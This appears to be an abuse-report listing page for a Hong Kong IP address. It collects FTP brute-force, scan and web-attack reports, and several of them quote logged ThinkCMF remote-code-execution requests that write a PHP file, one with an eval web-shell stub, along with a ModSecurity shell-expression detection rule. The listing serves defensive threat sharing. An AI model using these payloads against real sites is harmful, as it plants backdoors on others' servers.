๐ฉ๐ช
bescared
2024-12-25 05:33:26
(1 year ago)
Malicious activity detected. Unauthorized connection attempt: FTP.
Port Scan
Anonymous
2024-12-25 04:41:31
(1 year ago)
RdpGuard detected brute-force attempt on FTP
Brute-Force
Anonymous
2024-12-25 04:00:05
(1 year ago)
16x FTP auth failed (on 8 different accounts)
FTP Brute-Force
๐ฉ๐ช
rh24
2024-12-25 00:23:49
(1 year ago)
(ftpd) Failed FTP login from 134.122.135.139 (HK/Hong Kong/-)
FTP Brute-Force
Brute-Force
Anonymous
2024-12-18 10:25:07
(1 year ago)
Ports: 80,443; Direction: 0; Trigger: LF_CUSTOMTRIGGER
Brute-Force
SSH
๐ฆ๐บ
MAGIC
2024-12-18 02:04:07
(1 year ago)
VM5 Bad user agents ignoring web crawling rules. Draing bandwidth
DDoS Attack
Bad Web Bot
๐จ๐ญ
backslash
2024-12-17 17:02:35
(1 year ago)
SQL Injection
๐ฉ๐ช
Vegascosmetics
2024-12-16 22:50:47
(1 year ago)
Kingcopy(AI-IDS): IP is wandering around the site and acting suspiciously.
Bad Web Bot
๐ซ๐ท
subnetprotocol
2024-12-16 16:28:28
(1 year ago)
16/Dec/2024:17:28:25.448085 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
16/Dec/2024:17:28:25.448085 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 134.122.135.139] ModSecurity: Warning. Pattern match "(?:\\\\\\\\$(?:\\\\\\\\((?:\\\\\\\\(.*\\\\\\\\)|.*)\\\\\\\\)|\\\\\\\\{.*\\\\\\\\})|[<>]\\\\\\\\(.*\\\\\\\\))" at ARGS:content. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "367"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: >(./data/runtime/logs/portal/404.php </php><php>urldecode</php><php>(urldecode</php><php>(</php><php>base64_decode</php><php>(phrpdgxlpmnlc2hpideymzwvdgl0bgu )))) found within ARGS:content: <php>file_put_contents</php><php>(./data/runtime/logs/portal/404.php </php><php>urldecode</php><php>(urldecode</php><php>(</php><php>base64_decode</php><php>(phrpdgxlpmnlc2hpideymzwvdgl0bgu ))))</php>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.7"] [tag "application-multi"] [tag "language-shell"] [tag "platform-un
...
show less
Hacking
Web App Attack
๐ฌ๐ง
IRISIO
2024-12-16 15:06:09
(1 year ago)
scans/SQL injection/spam posts : 20 queries
SQL Injection
Web App Attack
๐ช๐ธ
el-brujo
2024-12-16 10:20:57
(1 year ago)
Cloudflare WAF: Request Path: / Request Query: ?a=display&templateFile=%3C%3Fphp%20file_put_contents ...
show more
Cloudflare WAF: Request Path: / Request Query: ?a=display&templateFile=%3C%3Fphp%20file_put_contents%28%27.%2Fdata%2Fruntime%2FLogs%2FPortal%2Flog.php%27%2C%27404%207call%3C%3Fphp%20%24ab%3D%24_REQUEST%5B77%5D%3B%3Beval%28%24a%5B2%5D.%24ab%29%3B%3F%3E Host: elhacker.net userAgent: python-requests/2.32.3 Action: log Source: firewallManaged ASN Description: CTGSERVERLIMITED-AS-AP CTG Server Limited Country: HK Method: GET Timestamp: 2024-12-16T10:20:57Z ruleId: 0f2da91cec674eb58006929e824b817c. Report generated by Cloudflare-WAF-to-AbuseIPDB (https://github.com/MHG-LAB/Cloudflare-WAF-to-AbuseIPDB).
show less
Hacking
SQL Injection
Web App Attack
๐ต๐ฑ
Ferron
2024-12-16 02:08:04
(1 year ago)
Blocked by EasyWAF
Module: xss
URL: svrjs.org/?a=fetch&templateFile=&prefix=&content=%3Cphp%3Efile_p ...
show more
Blocked by EasyWAF
Module: xss
URL: svrjs.org/?a=fetch&templateFile=&prefix=&content=%3Cphp%3Efile_put_contents%3C/php%3E%3Cphp%3E('./data/runtime/Logs/Portal/404.php',%3C/php%3E%3Cphp%3Eurldecode%3C/php%3E%3Cphp%3E(urldecode%3C/php%3E%3Cphp%3E(%3C/php%3E%3Cphp%3Ebase64_decode%3C/php%3E%3Cphp%3E(%22PHRpdGxlPmNlc2hpIDEyMzwvdGl0bGU+%22))))%3C/php%3E
show less
Hacking
๐บ๐ธ
rdpguard.com
2024-12-16 02:04:40
(1 year ago)
RdpGuard detected brute-force attempt on ASP.NET Web Forms
Brute-Force
๐ซ๐ท
subnetprotocol
2024-12-16 01:41:55
(1 year ago)
16/Dec/2024:02:41:52.549478 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
16/Dec/2024:02:41:52.549478 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 134.122.135.139] ModSecurity: Warning. Pattern match "(?:\\\\\\\\$(?:\\\\\\\\((?:\\\\\\\\(.*\\\\\\\\)|.*)\\\\\\\\)|\\\\\\\\{.*\\\\\\\\})|[<>]\\\\\\\\(.*\\\\\\\\))" at ARGS:content. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "367"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: >(./data/runtime/logs/portal/404.php </php><php>urldecode</php><php>(urldecode</php><php>(</php><php>base64_decode</php><php>(phrpdgxlpmnlc2hpideymzwvdgl0bgu )))) found within ARGS:content: <php>file_put_contents</php><php>(./data/runtime/logs/portal/404.php </php><php>urldecode</php><php>(urldecode</php><php>(</php><php>base64_decode</php><php>(phrpdgxlpmnlc2hpideymzwvdgl0bgu ))))</php>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.7"] [tag "application-multi"] [tag "language-shell"] [tag "platform-un
...
show less
Hacking
Web App Attack
๐จ๐ฆ
yukon.ca
2024-12-16 00:44:09
(1 year ago)
Web Server Enforcement Violation: ThinkCMF ThinkCMFX Remote Code Execution
Port:80
Hacking
Exploited Host